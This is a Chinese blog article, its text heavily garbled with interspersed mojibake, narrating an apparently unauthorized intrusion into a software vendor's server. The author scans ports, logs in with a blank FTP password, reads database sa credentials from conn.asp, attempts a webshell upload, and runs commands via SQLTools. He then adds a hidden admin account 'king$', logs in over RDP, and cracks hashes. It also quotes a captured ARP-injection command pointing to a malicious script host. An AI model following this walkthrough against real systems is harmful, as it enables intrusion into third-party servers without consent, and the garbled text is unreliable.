本文某一个软件产品所在的
服务器进行了
安全检测,一个细节就决定了一个系统的渗透成功。渗透成功后..
�T#p8r�o�w,e17240487一、安全检查原因
*f�T�S�W�r+p�k17240487IXPUB技术博客$r2g�N�t,G朋友需要购买一套学校OA系统,通过网络进行产品的查询,后面找到一家专门提供这种系统的公司,找到后把该公司的地址发给我,让我们给看看,评价一下系统如何,如果可以就打算定制一套。
�Z�]�\)T�E.W3F3m17240487在浏览器中打开网站地址“http://www.i****.net/products/case.asp”,如图1所示,从该公司产品中可以看到有许多网站类产品。
9n:x�t*S4r�D�W�J17240487�v)o�y�@4B17240487
 |
| 图1 查看公司软件产品 |
�m3Z�\0\+i/|�M!c�\*g�R17240487IXPUB技术博客:T�q3u7[�[6h�t�n二、完全正式检测
.H0E�n�\ m17240487 Y�q o7w�^;v172404871.信息收集
�p�T
R#w�}�v�n$t�K17240487%R9D9\&W�j17240487本次渗透换了一个查询域名等信息的网站http://www.ip866.com,在“IP/域名”中输入公司的域名地址“i****.net”,然后单击“查询详情”按钮查看该域名的有关情况,如图2所示,获取了该公司官方网站IP地址为“218.16.*.*”。IXPUB技术博客+L5y�k�J:E/A7A
�M9f�i�z�H�H�W17240487
 |
| 图1图2获取该公司官方网站服务器IP地址 |
IXPUB技术博客(L�j�x6W/F�F5^�n�Y*^2m
d�S8N�t�F3P3y
s�I172404872.获取绑定域名信息IXPUB技术博客�p�e%_�@9N
IXPUB技术博客�x1{�J1J
_�n"m在IP866.com网站上单击“反查域名”,单击“点这里反查全部相关域名”获取该服务器绑定的其它域名地址,如图3所示。
�K�[�s�|�}�l�m�`�p17240487�f ].b4p�?�F4N�|17240487
 |
| 图3 反查域名信息 |
IXPUB技术博客:U�K)A
Y�g0?�F�x3C�g"d�U�p.}172404873.查看网站信息
�m�j�E&i-V+~ G172404879y7])@)?�W4w�G(u)Z17240487在反查域名信息列表中单击网站名称,可以打开选中的网站,在查看反查出来的结果中发现有的网站已经被列入非名单,如图4所示,通过Firefox安全插件得知该网站已经被人攻击过,很有可能被人挂马了。IXPUB技术博客)w�o�w�~(A�|'R
�s�f5p0M�i,H5H*q�K17240487
 |
| 图4 通过Firefox安全插件获取网站安全情况 |
9M(P�V'@�Y9G'Z�{�B"A17240487%c�S�m�p�B�y172404874.获取端口开放情况
"}(T l#p5^,U17240487IXPUB技术博客9z4r�Z�c�D�m'O�W)c�|使用sfind扫描获取的ip地址,从扫描的结果来看,服务器开放了21、80、1433、3389端口,如图5所示。从获取的信息来判断,服务器的安全不是做的特别严格的那种,安全做的严格的服务器对外开放的端口非常少,有的仅仅开放80端口。
M�z�z$s�q6^�W172404876J1{�[+k�b�Q"E�^17240487
 |
| 图5 获取端口开放情况 |
IXPUB技术博客�U�c�?�v�[%f)S�C�b#l"l(H�R�D�[172404875.弱口令扫描IXPUB技术博客3M
t�v�z�b7@:P�P�Z
IXPUB技术博客,A.^$?;u�H;D�x F1e8y8Q�\在进行安全检测时,可以先对程序检测,也可以先对一些弱口令进行扫描。由于能够查看3389以及1433端口,因此先对Ftp、MSSQL口令进行扫描,然后再对网站进行安全检测。Ftp、MSSQL口令扫描结束后,发现该服务器有一个弱口令,用户名为ftp,口令为空。IXPUB技术博客�r1f
x6M�` [�B�I8G
IXPUB技术博客�B�p:J�M2H�m d�n6.使用Cuteftp软件进行登录尝试
�X1U p
l1q�F�Y:^17240487IXPUB技术博客6a�r�\�F/y�}"^�}
]先新建一个站点,在Label中输入一个标识,在“Host address”中输入服务器IP地址以及获取的用户名ftp,密码为空,在login method中选择“Anonymous”即匿名登录。IXPUB技术博客�K a;I
?
|$E�]
�b'?�u N+Q�L17240487
 |
| 图6 配置ftp软件 |
IXPUB技术博客�Y�C�y*V�i4iIXPUB技术博客
W1d�@9h�s7o连接成功后,如图7所示,从Cuteftp软件中可以查看到一些asp文件,在Ftp根目录中可以看到有conn.asp、config.asp以及index.asp,将其下载到本地。
�w4P X5]�|�|"f�E W17240487�?�_'a0K�s-Q;C�~'\17240487
 |
| 图7 下载获取的Ftp服务器目录下的文件 |
IXPUB技术博客!z�m%y�u�R C�i"D�P C&u)u172404877.查看代码文件IXPUB技术博客!}'\$e�G�[%N-S�I0|)R
�O�@4S�S,[17240487使用UE编辑器查看下载的conn.asp文件,如图8所示,其中数据库使用的是Mssql,截取其中部分关键代码进行分析:
&`3V
I:o8T/_&r2m�p5Z17240487IXPUB技术博客�| u1Y�}2e�w$}2r�_8U�FConst SystemDatabaseType = "SQL" IXPUB技术博客 h�j(L�J�i�t ?
Const DBFileName = "\database\RCSchool.mdb" IXPUB技术博客�N+T�L�D�P)q$J
Const SqlUsername = "sa" IXPUB技术博客*T(E-c�}0[�z5R�P
Const SqlPassword = "sh******" IXPUB技术博客�]�w
s�D�L
Const SqlDatabaseName = "RCSchool"
�h,]�w�q�R/p5S17240487Const SqlHostIP = "(local)" IXPUB技术博客�d4r6B�g�^(L;M�^&w-k.f
SystemDatabaseType = "SQL"表明系统是使用Mysql数据库,
t�`�m�O�|�b,I17240487IXPUB技术博客�U�L�a,G�{�v�K9r�@,ASqlUsername = "sa"表明该系统是使用最高权限角色用户sa,IXPUB技术博客(]9d*f
\�a T4d*d1Y �A�E8Y�n
~-e
a(t17240487SqlPassword = "sh******"告诉数据的密码是 ,IXPUB技术博客�G�e"k�y�U�t�E �B'S�?%R&U�p�j�\�z�I17240487“sh******”SqlDatabaseName = "RCSchool"告诉我们数据库的名称为“RCSchool”。 B:d;Y/F f6J%u�\3I
I�d17240487 |
IXPUB技术博客$D�}+Z�D�L0C1\+u#\�s4B
[�D&t�W*f&B6r17240487 |
| 图8 获取conn.asp文件中有关数据库相关信息 |
1q�e�I�y \#_2}5k�w�a"I17240487从获取的信息来看至少有三种方式进行渗透:
�D�U7j4s7S%I17240487IXPUB技术博客�b�B�e-a�o(a+B�N第一种是使用sqltools进行连接,然后直接执行命令、上传文件等操作,如果该方法不行,则可以尝试第二种。IXPUB技术博客 I�F*a)b-k�c4l&t
第二种是在本地通过sql Server企业服务器注册该数据库服务器,然后像在本地管理数据库一样来管理该数据库。IXPUB技术博客�M1p�l�D"]9z�?:{�M
第三种是上传一个数据库webshell或者直接上传一个其它webshell。
;N5l�C�j�P,d,r3U17240487�Y(r�w
p7i�e�q172404878.获取网站域名信息IXPUB技术博客)j1L2`4D6[�L�o+t
IXPUB技术博客�{+`�K�{4d�xConfig文件一般是网站的配置文件,通过查看config.asp文件,知道该网站的域名地址,如图9所示。IXPUB技术博客 H�n
{�Z�G-n�?4o
IXPUB技术博客7s)_;[�c�l�[ |
| 图9获取网站域名地址 |
�Q�N2E"y0{�R�C0P�_�l17240487�n2]�Z�p�@�S+@7Z.\172404879.上传webshell进行尝试IXPUB技术博客�w�Q�q�O
[:d.|5u%a
IXPUB技术博客�|6g�m.i�A�y4B使用cuteftp上传asp.net木马vip.aspx,先测试一个文件,如图10所示,在网站中输入一个已经存在的文本文件“采集错误修改.txt”,网页显示为“无法找到该页”,表明上传文件不在当前网站目录。看来此法不通。IXPUB技术博客,v�^�U%x1r�Y�y
IXPUB技术博客�[�w�m�W4d�z:v |
| 图10 无法查看上传文件 |
IXPUB技术博客
o9~+c'f�U Q!B�F4m�E�\7k!t�j2d1724048710.设置“SQLTools”
�E�h*Y'\�e�|�^�r-q E17240487"v,A�j�S�@�O�c#k
Z�x
s�p17240487在本地直接运行SQLTools程序,如图11所示,在“服务器名称/IP”中输入服务器的IP地址,用户名输入“sa”,密码输入从conn.asp文件获取的密码“sh******”,然后单击“确定”,进行连接。
 |
| 图11 设置SQL服务器 |
IXPUB技术博客#O-X�d�u�A)[连接成功后会在“SQL综合利用工具”底部的状态栏中显示连接情况,如图12所示,显示连接成功。
�P"g2\$r1h5L�?2Z�U172404872Y8y�q2p�U�@-K17240487
 |
| 图12连接SQL Server成功 |
+r4f�d.v�L�|17240487IXPUB技术博客3~$R�j%b9j11.执行命令测试
,{�g�?�u)a
j�Y&~&~�f.E�]17240487IXPUB技术博客%z/G8D�v*k9M�?在“SQL综合利用工具”中选择“执行DOS命令”,在其中执行“net localgroup administrators”命令来查看具有管理员权限的用户组,如图13所示,在该计算机中一共有3个具有管理员权限的用户。IXPUB技术博客�G�R�~2@/d(p
�i+a�H�|(T�P�e"j17240487
 |
| 图13 查看管理员用户组 |
@,q#r*n
b |
| 图14 添加king$用户到系统中 |
IXPUB技术博客�`0~�r�I�M�}�p;z�g+xIXPUB技术博客 [�?�z$`�JIXPUB技术博客8u S/C#z�I2R(E8R;n�a*I!C
IXPUB技术博客�E
I�m�L2c�d+a
IXPUB技术博客 j;w�e#U�a)| A)\ |
| 图15将king$添加到管理员组 |
IXPUB技术博客�];t,H*e6V1v�Z;K�w2?"w�N17240487IXPUB技术博客%h�?*^�i�k�y
13.再次查看管理员组IXPUB技术博客�h+z7Z0y/U8B8V;o
IXPUB技术博客�j�@1d�c
V
s5H�C使用“net localgroup administrators”命令来查看系统中具有管理员权限的用户,如图16所示。IXPUB技术博客3y#]�J�F�e4Y-L;e
�i7|�~ |�c
`�K!]!M17240487
 |
| 图16 查看具有管理员权限用户 |
IXPUB技术博客�]�q1F�t�u3M/p$s!L�R4n'G�V4H
G6F�m�e"X1724048714.登录3389
*i�X�h�Z�i;^�w17240487IXPUB技术博客8@ j�M8B0w+A7F�A打开3389登录器,在其中输入刚才添加到用户king$和密码,如图17所示,然后单击“连接”按钮进行3389登录尝试。
 |
| 图17进行3389登录尝试 |
IXPUB技术博客7F�m c�u)[�MIXPUB技术博客�V�a�C+]�`�o l�Y�v15.成功进入系统IXPUB技术博客�J*K�b2m v
IXPUB技术博客6|�W-]�{/Q
G如图18所示,进入系统后输入“ipconfig /all”命令查看该计算机IP地址配置信息。IXPUB技术博客�s"v#I�}9_;]*n$N
IXPUB技术博客;W*E3V�M:? |
| 图18查看网络配置情况 |
5`�G%Y1V9W17240487IXPUB技术博客#I7M�U�~�B�N#T1_8D�l0B16.查看网站配置情况
�h-P/e.h
k(F�f r�b�Q17240487%]7X�K�Q�t+k'M2D�z17240487单击“开始”-“程序”-“控制面板”-“管理工具”-“IIS信息服务”,打开IIS信息服务管理器,如图19所示,一共有16个站点,这些站点大部分是asp语言编写的,都是以源代码形式保存在系统中的。IXPUB技术博客8E&W
L
v�I!H-{�v�W
IXPUB技术博客!@9P�C8o�j�G:U�\3Q*f |
| 图19找到网站 |
IXPUB技术博客3k!Y�u�X�U%o7L�}�_IXPUB技术博客5~![�h X8T
y三.系统查看
/V�x1L2a�r5z)a�s
L17240487!c�y F&p7l�[�N |17240487到此,已经顺利进入系统,下面就是对系统的一些配置、漏洞以及木马等情况进行查看。
'^
t-p8t({�f17240487IXPUB技术博客�|�s+F5n�] [1.使用“瑞星卡卡上网安全助手”查看系统补丁更新情况
7S:w�C�s#g8n6|17240487IXPUB技术博客)\�Q O�d�|-c�o�`2g�\在该系统中安装了“瑞星卡卡上网安全助手”软件,通过“瑞星卡卡上网安全助手”可以直接扫描系统中存在的漏洞情况,如图20所示,扫描到12个系统漏洞,单击“修复”按钮立即下载补丁并修复系统存在的漏洞。IXPUB技术博客._�K
V�M8K�H
�p�l!M�f�p�}�c17240487
 |
| 图20查找系统漏洞并修复 |
�n�\�o�c*?"k�B-N�k17240487IXPUB技术博客([1C�\�b,H0L z�X,v2.找到系统arp挂马代码
�S9?"u6Q&w�X�y17240487�o�B/h
Q�W�N�B9I&` o�L17240487在系统wmpub目录中发现大量的可执行文件和批处理,直接查看crss.bat脚本文件,如图21所示,其代码如下:
�@�J-^�D/U'O�L�z�l17240487�g�f�J�L�R�U0s:t-D�o17240487smss.exe -idx 0 -ip 221.5.250.2-221.5.250.130 -port 80 -insert " .D k a�b�V"Q17240487IXPUB技术博客�C�k�[2l$b�_�}8T#Y< SCRIPT. language=javascript. src=" �u&@�j�F A�@,{17240487IXPUB技术博客�k�_�j
T�j/t�h�g�Q5g(A href=’http://www.forklift-shuangli.com/ccwu/admin/up/flash.js")IXPUB技术博客�}�Q&R�[!Q |�N.C-n �G$u0m"t!S�Y1r17240487%20(%20/%20script’) http://www.forklift-shuangli.com/ccwu/admin/up/flash.js"> s"f�f�}0m�f#d)U17240487IXPUB技术博客,e�k�k:{2?$O< / SCRIPT. < A > > " -spoofmode 2IXPUB技术博客.G�a y�j�N2A�t
|
IXPUB技术博客�h+@6j I5`9\1z'I
_/@ S该代码为典型的流量劫持,将访问221.5.250.2-221.5.250.130网段的80端口全部转向到“http://www.forklift-shuangli.com/ccwu/admin/up/flash.js”地址,该地址明显为木马地址。IXPUB技术博客�m)g�W:P�Q B�_#q9o�m
IXPUB技术博客�b�b:B2Z�q$W�N }�p0Y n |
| 图21找到arp挂马代码 |
IXPUB技术博客�d�@�~�B�h�q�V SIXPUB技术博客�?
p'q�s�y�G�E6L*O3.使用autoruns软件查看系统服务等情况
x�Z!y2S;Y)j)^17240487(e2U.i�J�j&|17240487使用autoruns软件查看系统的服务等运行情况,在其中可以看到有灰鸽子服务,直接删除其中的一些木马程序和可疑程序,如图22所示。
M�x%G6o�t�\�L17240487IXPUB技术博客2N0~�y+~�l�S&C |
| 图22 找到灰鸽子服务 |
�@�\/e2W0R�q0`�~17240487IXPUB技术博客(l*B�a%n�|�P5|
k#^4.使用360安全卫士进行安全加固IXPUB技术博客�C3y-q�[&Q�R
IXPUB技术博客0B(S�q
{8j)k�m1H下载360安全卫士最新版本,运行360安全卫士,使用其来查杀系统中的木马等病毒,如图23所示,在安装时就检测出3个病毒文件,安装完毕后,查杀系统中的恶意插件以及病毒。IXPUB技术博客*c({2o�Q;J
IXPUB技术博客�x7N�[�G�@*i�m�N9r |
| 图23使用360卫士查杀病毒 |
IXPUB技术博客�A.R�s'E�F�K�B*x/H�k�m.c.^17240487四、总结与收获IXPUB技术博客�V8k/@�Y�s p4L&E�Z
IXPUB技术博客�n;E�}3e:h*x�}�a本次检测使用的是一些比较简单的技术,弱口令扫描,然后就是利用“SQL综合利用工具”直接连接数据库,通过添加用户直接登录3389,进而全面控制系统。在系统中发现了包括灰鸽子在内的多个木马程序,其中还有arp挂马程序,后面通过获取系统密码hash,通过导入lc5破解,发现该系统的密码就是数据库sa所对应的密码,如图24所示,如果在最初使用这个密码尝试一下,会更快的进入系统,这就是社会工程学的厉害之处。
5j;v�z*l B�}4N6v17240487IXPUB技术博客%k�D4P%q�s |
| 图24 使用lc5破解系统密码 |
IXPUB技术博客 O�i�V�V1U�C�rIXPUB技术博客-k2k�U�v,H.c在文章结束时,对该服务器重新进行连接,发现添加到用户已经被删除,ftp也设置密码,但是通过sqltools仍然可以连接进入系统。IXPUB技术博客�@
S-L�h�O�u.@
